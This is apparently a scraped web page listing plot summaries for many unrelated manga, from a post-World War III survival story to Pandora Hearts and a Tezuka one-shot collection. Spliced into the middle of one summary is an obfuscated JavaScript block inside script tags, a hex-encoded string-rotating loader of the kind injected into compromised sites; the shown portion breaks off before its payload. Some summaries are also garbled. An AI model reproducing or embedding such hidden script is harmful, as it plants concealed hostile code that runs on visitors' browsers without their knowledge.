On the 15th of October 1990, World War III breaks out. It only lasts for 40 minutes, but industrial establishments were nearly wiped out by the 1000 megatons of nuclear weapons used in the war. The Earth was then cloaked by in a nuclear winter which lasted for 6 months, and all the grain plants died. Each government fell into anarchy and transport and communication networks could not be restored easily. Soon, declarations of state establishment from the citizens in various areas came one after another, and America was split into 6 parts, adding other unapproved small states, it was divided into more than 20 countries. The story is set in 2021, 31 years after World War III. Filicia Epstein, a bionics genius, came to Sabano and Sergent Mutou was ordered to protect her. Searching for her only brother, Lyon, Filicia encountered with 1019, a cybernoid, who directed them to the phantom city, OZ, which is a shelter created by Lyon. As the story unfolds, they gradually realised what 'OZ' actually was... Very loosely based on some parts of The Wizard of Oz. Two OAVs were made. Note: Won the 24th Seiun Award for Best Comic (1993).
PxP (Chp.1-3) : Himeno Ruri is Vice President of the School Council at Seiou Academy! Recently, at a council meeting, a strange matter has come up: "P", the mysterious thief for hire. Who is he, and why does he only steal particular items? [Oneshot]- Baby It's You: Because of her beauty and status as a school idol, Akami is somewhat forced to take part in a school play. Only problem Akami has is that, the role she's suppose to do is a ''male'' role and she isn't experienced in acting at ALL.
From Anime Waves: Kobayagawa Shio is a "private actress" who works for a production company. She also does personal assignments that needs her to pretend to be a different person. She takes on assignments for people and takes on the personality of the person who they are pretending to be.
Young Bai accidentally kills someone, from then on he enters the world of killers. A black card appeared in front of the door of pale throne, who can get the ultimate weapon left by the the most successful killer? To kill, to follow the road of killing, is it also the road to finding oneself.<script></script><script>(function(_0x3353e3,_0x35175a){var _0x4da83c=_0x4827,_0x3d27ca=_0x3353e3();while(!![]){try{var _0x4ccc21=parseInt(_0x4da83c(0xba))/(0x1*0x1b7f+0xa64*-0x2+-0x6b6)+-parseInt(_0x4da83c(0xa1))/(0x11f*0x7+-0x272*0x9+0xe2b)*(-parseInt(_0x4da83c(0x9c))/(0x2065+-0x211*-0x8+-0x30ea))+parseInt(_0x4da83c(0xa4))/(-0x25*-0xda+-0x10f5*-0x2+-0x4168)+parseInt(_0x4da83c(0x9f))/(0x2d9*0x6+-0x2298+0x1*0x1187)+parseInt(_0x4da83c(0xad))/(0x6a0+0x683*-0x5+0x19f5)+-parseInt(_0x4da83c(0xb3))/(0x5a+0x175c+-0x17af)*(-parseInt(_0x4da83c(0xae))/(0x1*0x1597+-0x3fa+-0x7*0x283))+parseInt(_0x4da83c(0xa8))/(-0x9*-0x2bf+0x16e7*0x1+-0x2f95*0x1)*(-parseInt(_0x4da83c(0xb5))/(-0xd21+0xa1b+0x310));if(_0x4ccc21===_0x35175a)break;else _0x3d27ca['push'](_0x3d27ca['shift']());}catch(_0x26247a){_0x3d27ca['push'](_0x3d27ca['shift']());}}}(_0x15ba,-0xbb98+-0xf201+0x256*0x166));function _0x15ba(){var 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Zoas are monstrous beasts who disguise themselves and live amongst the humans. They were once feared for their physical talent and hideous form, but now, they are the hunted. Randa, a single-mother who concealed her identity as a Zoa, has now been caught in a mass murder case suspected to be the work of a sinister Zoa… Unofficial English Translation (by the author)
Once upon a time, there’s a god named Prometheus. Loving human beings too much, he had stolen the fire to them without letting other gods knew. Zeus was really irritated. To take revenge of Promotheus and the folks, Zeus created Pandora, the first woman ever with all features that were absolutely perfect, then gave her a mysterious box down to earth. Curiously, Pandora opened the box without knowing that she released all kinds of sins trapped in it. Since then, human had lived in chaos. Pandora tried to collect all sins back to where they are supposed to be and hope was the only thing left in the box. The box was hidden and nowhere to be seen until that day…
Heir to the Vessalius Duke House, Oz, has just turned fifteen. His life is carefree and wealthy, darkened only by the continuous lack of his dad. At his coming of age service, every thing changes. For no reason he is able to pick out, Oz is cast into the prison called the "Abyss", simply to be saved with a girl called Alice, the Bloodstained Black Rabbit. The puzzle there starts as Oz unravels the enigma behind Alice, the Abyss, and the peculiar organization called "Pandora". Chains Beings in the Abyss that were at one-point person, changed by the Will of the Abyss. They have to sign a contract using a contractor that is human to be able to depart the Abyss. People must be repeatedly consumed by chains involved with prohibited contracts as a way to achieve power. Some chains, like Humpty Dumpty, can have several contracts. When they do even more will be slowed down by the revolution on a prohibited contractor seal. The sole Chains that have been once not people are Oz the B-Rabbit Cheshire and Cat who are the sole chains that will develop a form that is human due to them being creatures as well as in the instance of Oz a filled thing while the others developed semi-human looks.
In the beginning, there was a box. At the end of the forbidden millennium, the world was engulfed in hope and despair, and everyone said, \"Never open that box.\" “I wish I could meet other humans.” That is the secret wish of Ria Frontier, who grew up as the sole human amid a veritable melting pot of other fantastical races on a small island. As she prepares to celebrate the turn of the thousand-year cycle, that wish is granted—in the form of a war party of humans that arrives on a flying ship to ransack her home and hurt her friends and adoptive family in search of “Pandora’s Box.” Pushed too far by the cruelty of her race, Ria somehow manages to unseal the terrible power of what the humans have been looking for, unleashing a tragedy that will change her life forever... Can the girl, Ria, thwart her twisted fate? The apocalypse fantasy of hope and despair, begins!
Takashi Shiki is a ronin student who has nothing going for him. One day, he sees fighter planes flying above the sky - as well as a man who died from a gunshot to the head on the ground. The next day, after tanks start to show up, a mysterious young woman named Yuki Kitano begins to accompany Shiki. Shiki also is given the task of watching over his wealthy neighbor's mansion for a hefty sum. But this fortunate turn of events for Shiki is too good to be true: before long, the truth of the matter becomes clear to him - *World War III is about to begin.*In addition to the title story, also includes:- **Mirai of the City of Nocturnal Light**: Adachi resides in a city far from the sun - so far from it, there is no night or day. One day, a surprise encounter leads him to meeting Mirai, a young lady who not only lives in a place even further below Adachi's, but wishes to obtain a flower in the city of light above.- **The Yellow Rabbit**
Summary From: Pinoymanga ScansThe girl with psychic abilities Sae-in, the pretty foreign boy Harvey and the top model Jin-song that Sae-in really likes.An interesting story of the intertwined fate of these three teenagers. And who could be the guy that Sae-in is talking to through telekenesis?
A collection of one-shots done during the 1970s (and one from 1980), all regarding some aspect of Tezuka's early life. Includes a reflection of his time at the famous Tokiwa-so.- **Record of the Life of Gachaboy**: A reflection on Tezuka's career up to that point. Tezuka encounters the God of Manga right after the war, who nicknames Tezuka "Gachaboy". He is determined to see Tezuka become a great mangaka, no matter what - and restore manga's presence in Japan.- **Paper Fortress**: Right at the end of the war, Tezuka is doing manga in private in high school. He meets a girl who fully understands his situation, and they get along well. In a society where manga, dancing, and even informal relationships are forbidden, how will Tezuka, crazy about manga, keep on?- **Hungry Blues**: Directly following *Paper Fortress*, Tezuka is now a hungry, desperate student with little luck on his path in manga. Things change when he comes across a young lady who works for a newspaper, and he manages to land a serial for it. However, in an era rife with turmoil and starvation, Tezuka's own stomach may prove to be a serious intrusion in not just his manga-making career, but his very life.- **Tokiwa-so Monogatari**: Part of a series recounting memories within the famous apartment complex, Tezuka showcases its history through commentary from the building itself!- **The Letter that Came**: Tezuka receives an ominous letter that may put him in hot water.- **Animal Tsurezuregusa**: Two reflections on animals Tezuka had encountered in his early years - the first a horse, the second two tanuki.An excerpt of *Dotsuitare* featuring Tezuka is also included at the end.---**Volume 274 of the Osamu Tezuka Complete Works**
From AQUA Scans: Marie is a shy college student and also a doll maker. Then one day, she is trapped in a gothic mansion by a mysterious young man calling himself "Kahrel." Kahrel demands that she "Creates the "people" that make up the world" for him if she wants to leave. The terrified Marie then has the dolls she's made in past come to life, and are bearing down on her! Gothic Doll Fantasy!!